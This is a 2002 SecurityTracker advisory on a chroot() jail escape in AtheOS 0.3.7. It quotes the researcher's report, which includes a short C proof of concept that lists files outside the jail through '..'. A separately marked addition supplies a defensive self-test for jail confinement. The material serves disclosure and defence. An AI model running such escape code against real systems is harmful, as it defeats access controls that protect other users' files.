


Category:   OS (Other)  >   AtheOS Vendors:
AtheOS Operating System chroot() Function Lets Local Users Break Out and Access Files Outside of the Chroot Jail
SecurityTracker Alert ID:  1003500
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 10 2002
Impact:   Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): 0.3.7, possibly other versions
Description:   A vulnerability was reported in the AtheOS desktop operating system. A local user can break out of a chroot() jail and access files on the system.

It is reported that a local user can break out of a chroot() jail. After a chroot() call on AtheOS, the base directory will become the '/' root directory for that user. However, it is reported that relative paths aren't checked against the current chroot jail. Because of this, a local user can use a file path such as '../../../../path/to/file' to obtain files located outside of the chroot limits.

Demonstration exploit code is provided in the Source Message.

Impact:   A local user in a chroot() jail can break out of the directory limits of the jail and access other files on the system.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Access control error

Message History:   None.

 Source Message Contents

Subject:  AtheOS: escaping from a chroot jail

                          -------( AtheOS )-------

  AtheOS is a free desktop operating system under the GPL license. AtheOS
currently runs on Intel, AMD and other compatible processors and supports the
Intel Multi Processor architecture.

  AtheOS home page is :
                       -------( Vulnerability )-------
  A chroot() call is implemented in AtheOS, and its behavior is supposed to
be POSIX conformant. Once chroot(<directory>) is issued by a process,
<directory> should become the base directory ('/') with no way to go out of
the jail. That feature is widely used to protect applications against
unwanted directory traversals (ftp, http, etc.).

  After a chroot() call on AtheOS, '/' indeed seems to become the base
directory. '/path/to/file' is translated to '<directory>/path/to/file'.

  Unfortunately, relative paths aren't checked against the current chroot
jail. Therefore, '../../../../path/to/file' will be translated to a file out
of the chroot limits.
                     -------( Affected versions )-------
  Version 0.3.7 seems to be affected by that bug. I didn't check any prior
release, but they may be vulnerable as well.

                  -------( Simple proof of concept )-------

  The following code will read the content of the real '/' directory, while
'/tmp' is supposed to be the base of the chroot jail.

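#include <stdio.h>
#include <unistd.h>
#include <dirent.h>

int main(void)
{
    register DIR *d;
    register const struct dirent *e;

    /* Enter the jail at /tmp, move to its root, then open ".." from there. */
    if (chdir("/") || chroot("/tmp") || chdir("/") ||
        (d = opendir("..")) == NULL) {
        return 1;
    }
    /* List what ".." resolved to; inside a working jail this is the jail root. */
    while ((e = readdir(d)) != NULL) {
        puts(e->d_name);
    }
    closedir(d);
    return 0;
}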

                    -------( Vendor notification )-------

  I reported the problem to the AtheOS maintainer <> on
January 2nd. The mail bounced (message id: on
January 10th.

  I sent back another mail to <> (message id : . The mail bounced on January 17th.

  I finally sent a mail to the AtheOS-Developer mailing-list. No one ever

                          -------( Impact )-------

  Don't trust chroot() on AtheOS. Users can traverse directories.

  Best regards,


 __  /*-      Frank DENIS (Jedi/Sector One) <j@42-Networks.Com>     -*\  __
 \ '/    <a href="http://www.PureFTPd.Org/"> Secure FTP Server </a>    \' /
  \/  <a href="http://www.Jedi.Claranet.Fr/"> Misc. free software </a>  \/
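
Added example, not part of the advisory or of the original message: a startup self-test that a service can run right after chroot() to confirm that '..' chains from the jail root resolve back to the jail root before it relies on the jail. The function names are hypothetical, and it assumes POSIX stat() reports stable st_dev/st_ino values on the target system.

```c
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Declared explicitly because strict -std=c99/c11 builds hide it in <unistd.h>. */
int chroot(const char *path);

/* Returns 1 if every ".." chain from the root resolves to the root itself,
 * 0 if any of them resolves elsewhere (the jail is open), -1 on error. */
int dotdot_confined(void)
{
    static const char *const probes[] = { "..", "../..", "../../../.." };
    struct stat root, up;
    size_t i;

    if (chdir("/") != 0 || stat("/", &root) != 0)
        return -1;
    for (i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        if (stat(probes[i], &up) != 0)
            return -1;
        if (up.st_dev != root.st_dev || up.st_ino != root.st_ino)
            return 0;
    }
    return 1;
}

/* Enter the jail, then refuse to continue unless the self-test passes.
 * Returns 0 when the jail is confirmed closed, -1 otherwise. */
int enter_jail_checked(const char *jail)
{
    if (chdir(jail) != 0 || chroot(jail) != 0) {
        perror("chroot");
        return -1;
    }
    if (dotdot_confined() != 1) {
        fprintf(stderr, "'..' leaves the jail root; not trusting chroot()\n");
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    /* No argument: test the current root only (needs no privilege). */
    if (argc < 2)
        return dotdot_confined() == 1 ? 0 : 1;
    /* Directory argument: chroot() into it first (needs root). */
    return enter_jail_checked(argv[1]) == 0 ? 0 : 1;
}
```

A service that gets a non-zero result should exit rather than serve requests from a jail it cannot rely on.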

